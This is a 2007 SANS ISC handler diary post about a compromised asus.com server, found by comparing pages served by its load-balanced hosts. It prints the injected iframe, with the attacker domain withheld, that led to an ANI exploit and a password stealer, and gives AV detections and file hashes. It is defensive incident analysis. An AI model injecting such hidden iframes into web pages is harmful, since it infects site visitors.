Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog - asus.com exploited InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

asus.com exploited

Published: 2007-04-06
Last Updated: 2007-04-07 17:48:47 UTC
by Swa Frantzen (Version: 2)
0 comment(s)

In the past days a handful of readers had sent us notes that asus.com was compromised. We unfortunately could not find anything wrong in the html at all.

Today the kaspersky blog had an entry about a ANI exploit loaded via an iframe at asus.com.

So we fetch a new copy, still nothing to be seen. Until Johannes suggested asus.com might be load balanced, and yes indeed it seems it is using DNS load balancing:

$ dig asus.com a

; <<>> DiG 9.2.3 <<>> asus.com a
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;asus.com. IN A

;; ANSWER SECTION:
asus.com. 14400 IN A 195.33.130.151
asus.com. 14400 IN A 205.158.107.130

;; AUTHORITY SECTION:
asus.com. 14400 IN NS dns3.asus.com.
asus.com. 14400 IN NS dns7.asus.com.

;; Query time: 18 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri Apr 6 23:33:01 2007
;; MSG SIZE rcvd: 96

Fetching a copy of the home page of both servers, and comparing the resulting page yields:

(line breaks added to make page easier to read)

$ diff index.html index.html.1 
55c55
<
</table>
---
>
</table><iframe src=http://[DELETED].com/app/helptop.do?id=ad003
width=100 height=0></iframe>

Just goes to learn that a load balanced site is a pain to investigate if only some of the servers are affected.

The script at the time we looked at it was obfuscated and leads to a VBscript, that's up to no good pointing to another obfuscated javascript and a executable cloaked as a jpg file.

That file gives following over at virustotal:

Antivirus Version Update Result
AhnLab-V3 2007.4.7.0 20070406 -
AntiVir 7.3.1.48 20070406 TR/Drop.Ag.344576.B
Authentium 4.93.8 20070406 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 20070406 Win32:Tibs-ADO
AVG 7.5.0.447 20070405 -
BitDefender 7.2 20070406 -
CAT-QuickHeal 9.00 20070406 (Suspicious) - DNAScan
ClamAV devel-20070312 20070406 -
DrWeb 4.33 20070406 -
eSafe 7.0.15.0 20070406 suspicious Trojan/Worm
eTrust-Vet 30.7.3546 20070406 Win32/NSAnti
Ewido 4.0 20070406 -
F-Prot 4.3.1.45 20070404 W32/PWStealer.gen1
F-Secure 6.70.13030.0 20070406 -
FileAdvisor 1 20070407 -
Fortinet 2.85.0.0 20070406 suspicious
Ikarus T3.1.1.3 20070406 MalwareScope.Worm.Viking.3
Kaspersky 4.0.2.24 20070406 Trojan-PSW.Win32.OnLineGames.kw
McAfee 5003 20070406 New Malware.bc
Microsoft 1.2405 20070406 -
NOD32v2 2171 20070406 -
Norman 5.80.02 20070405 -
Panda 9.0.0.4 20070406 Suspicious file
Prevx1 V2 20070407 -
Sophos 4.16.0 20070406 Mal/EncPk-F
Sunbelt 2.2.907.0 20070403 -
Symantec 10 20070406 -
TheHacker 6.1.6.085 20070404 -
VBA32 3.11.3 20070406 Trojan-PSW.Win32.Nilage.ara
VirusBuster 4.3.7:9 20070406 -
Webwasher-Gateway 6.0.1 20070406 Trojan.Drop.Ag.344576.B

File:
Name next3.png
Size 100539
md5 42a248b8634da52d6044f87db9a8d794
sha1 cf612836be3c763ab9dc2c9afc0ccc112f2c2a04
Date scanned 04/07/2007 00:09:16 (CET)

Password stealer it seems, same old goal.

I've not seen an ANI exploit in there right now, but we can be easily looking at something that's dynamic in some other way as well.

UPDATE #1:
It seems asus did take down the hacked server in the mean time.

UPDATE #2:
That second javascript referred in the vbscript above didn't decode, it seems it's just not encoded right, but when decoding the string with a plain base64 routine, it does decode to what leads to an ANI exploit. You never know what a buggy script and a buggy browser do together.

UPDATE #3:
Roger tested other language versions of the asus websites and there are more references to the first javascript with an iframe loading it out there.

Off to warn them once again...

--
Swa Frantzen -- NET2S

 



Keywords:
0 comment(s)
Diary Archives